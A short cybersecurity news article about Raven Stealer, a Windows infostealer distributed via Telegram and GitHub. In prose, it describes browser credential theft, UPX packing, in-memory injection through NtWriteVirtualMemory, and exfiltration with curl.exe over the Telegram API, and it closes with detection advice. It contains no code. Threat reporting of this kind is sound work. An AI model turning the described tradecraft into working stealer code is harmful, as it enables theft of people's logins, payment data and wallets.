Redazione RHC : 30 July 2025 10:50
Amid growing activity by malicious campaigns using legitimate communication channels to bypass traditional defenses, a new tool has attracted the attention of cybersecurity specialists: Raven Stealer. This information-stealing program appeared in July 2025 and has already spread via Telegram and GitHub, attracting attention not only for its functionality but also for its combination of stealth, ease of use, and effectiveness in delivering stolen data.
Raven is currently the subject of heated discussion among threat analysts, as it demonstrates how antivirus and browser-integrated protection mechanisms can be bypassed with simple means. Raven Stealer is developed in Delphi and C++ and targets Windows systems. It collects logins, payment details, and autofills from Chromium browsers, including Chrome and Edge. The malware is distributed via ZeroTrace’s Telegram channel as a “training tool” and allows even inexperienced users to initiate data theft attacks using the built-in build generator. Telegram is also used as a conduit for transmitting stolen information, eliminating the need for a traditional C2 server.
Assemblies are compressed using UPX to make analysis difficult and avoid detection. Once launched, the malware injects an encrypted module into browser processes using system calls such as NtWriteVirtualMemory, allowing it to bypass the file system. Passwords, cookies, and payment data are extracted into memory, bypassing the application’s encryption protection.
Furthermore, Raven scans the system for crypto wallets, VPNs, and games, and saves all data in a ZIP archive under the username. Transfer occurs via “curl.exe,” which uses the Telegram API to download files, including screenshots and text lists with sensitive information. The methods implemented in Raven correspond to several MITRE ATT&CK techniques: obfuscation, hidden windows, directory harvesting, and using Telegram as a command channel. This architecture makes the tool powerful and stealthy.
The ZeroTrace team has been supporting the project since the end of April 2025, publishing updates and source code on GitHub and Telegram. The malware has already been compared to another of their products, Octalyn Stealer, demonstrating a systematic strategy for distributing simple yet effective infostealers. As protective measures, experts recommend monitoring UPX-compressed files, non-standard browser launch flags, curl calls, and Telegram API access, as well as using behavioral analysis and system call monitoring.
Raven Stealer is further proof of how easily technology can be transformed into an underground profit tool. Under the guise of a “training tool,” lies a predatory utility that does not teach, but corrupts, simplifying the path to crime and blurring the line between development and complicity.
Redazione